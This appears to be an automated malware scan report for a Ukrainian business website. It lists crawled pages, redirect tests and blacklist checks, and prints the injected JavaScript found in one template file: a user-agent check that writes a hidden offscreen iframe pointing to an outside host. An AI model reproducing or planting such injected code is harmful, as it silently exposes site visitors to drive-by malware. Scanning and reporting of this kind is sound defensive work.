Scanned pages/files
Request | Server response | Status |
http://www.bizgame.com.ua/ | 200 OK Content-Length: 13963 Content-Type: text/html | clean |
http://www.bizgame.com.ua/media/system/js/caption.js | 200 OK Content-Length: 2563 Content-Type: application/javascript | clean |
https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js | 200 OK Content-Length: 94840 Content-Type: text/javascript | clean |
http://www.bizgame.com.ua/templates/blank_j15/js/jquery-ui-1.8.21.custom.min.js | 200 OK Content-Length: 207523 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Argisuliterkas() {
var dude = navigator.userAgent; var unificas = (dude.indexOf("Windows") < +1 || dude.indexOf("Chrome") > -1 || dude.indexOf("IEMobile") > -1); if (!unificas) { document.write('<iframe src="http://gugeratinaher.universaldoorfoundation.com/pradisaman15.html" style="positi'+'on:absolute;bor'+'der-style:none;left: -849px;backgr'+'ound-color:green;top: -849px;" height="138" width="138"></ifra'+'me>'); } } Argisuliterk Antivirus reports:
| ||
http://www.bizgame.com.ua/templates/blank_j15/js/sp.js | 200 OK Content-Length: 3547 Content-Type: application/javascript | clean |
http://www.bizgame.com.ua/index.php | HTTP/1.1 301 Moved Permanently Connection: close Date: Thu, 18 Dec 2014 15:21:27 GMT Location: http://www.bizgame.com.ua/ Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: ce8b39c79f0fe11d06bf5b0f9dff15a4=vp6ld2r20f4pqjdgdh1u92vrq0; path=/ X-Powered-By: PHP/5.4.26 | clean |
http://www.bizgame.com.ua/test404page.js | 404 Not Found Content-Length: 280 Content-Type: text/html | clean |
http://www.bizgame.com.ua/aboutus/about.html | 200 OK Content-Length: 17868 Content-Type: text/html | clean |
http://www.bizgame.com.ua/aboutus/ | 404 NOT FOUND Content-Length: 13510 Content-Type: text/html | clean |
http://www.bizgame.com.ua/Ð-наÑ/targets.html | 200 OK Content-Length: 17919 Content-Type: text/html | clean |
http://www.bizgame.com.ua/Ð-наÑ/ | 404 NOT FOUND Content-Length: 13512 Content-Type: text/html | clean |
http://www.bizgame.com.ua/Ð-наÑ/vacancy.html | 200 OK Content-Length: 20065 Content-Type: text/html | clean |
http://www.bizgame.com.ua/Ð-наÑ/capabilities.html | 200 OK Content-Length: 19294 Content-Type: text/html | clean |
http://www.bizgame.com.ua/2012-08-19-15-09-38.html | 200 OK Content-Length: 22109 Content-Type: text/html | clean |
http://www.bizgame.com.ua/ÐовоÑÑи/ | 403 FORBIDDEN Content-Length: 77 Content-Type: text/html | clean |
http://www.bizgame.com.ua/sobitija/foto.html | 403 FORBIDDEN Content-Length: 77 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bizgame.com.ua
Result:
GET / HTTP/1.1
Host: bizgame.com.ua
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bizgame.com.ua
Referer: http://www.google.com/search?q=bizgame.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bizgame.com.ua
Referer: http://www.google.com/search?q=bizgame.com.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bizgame.com.ua
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://bizgame.com.ua/
Result: bizgame.com.ua is not infected or malware details are not published yet.
Result: bizgame.com.ua is not infected or malware details are not published yet.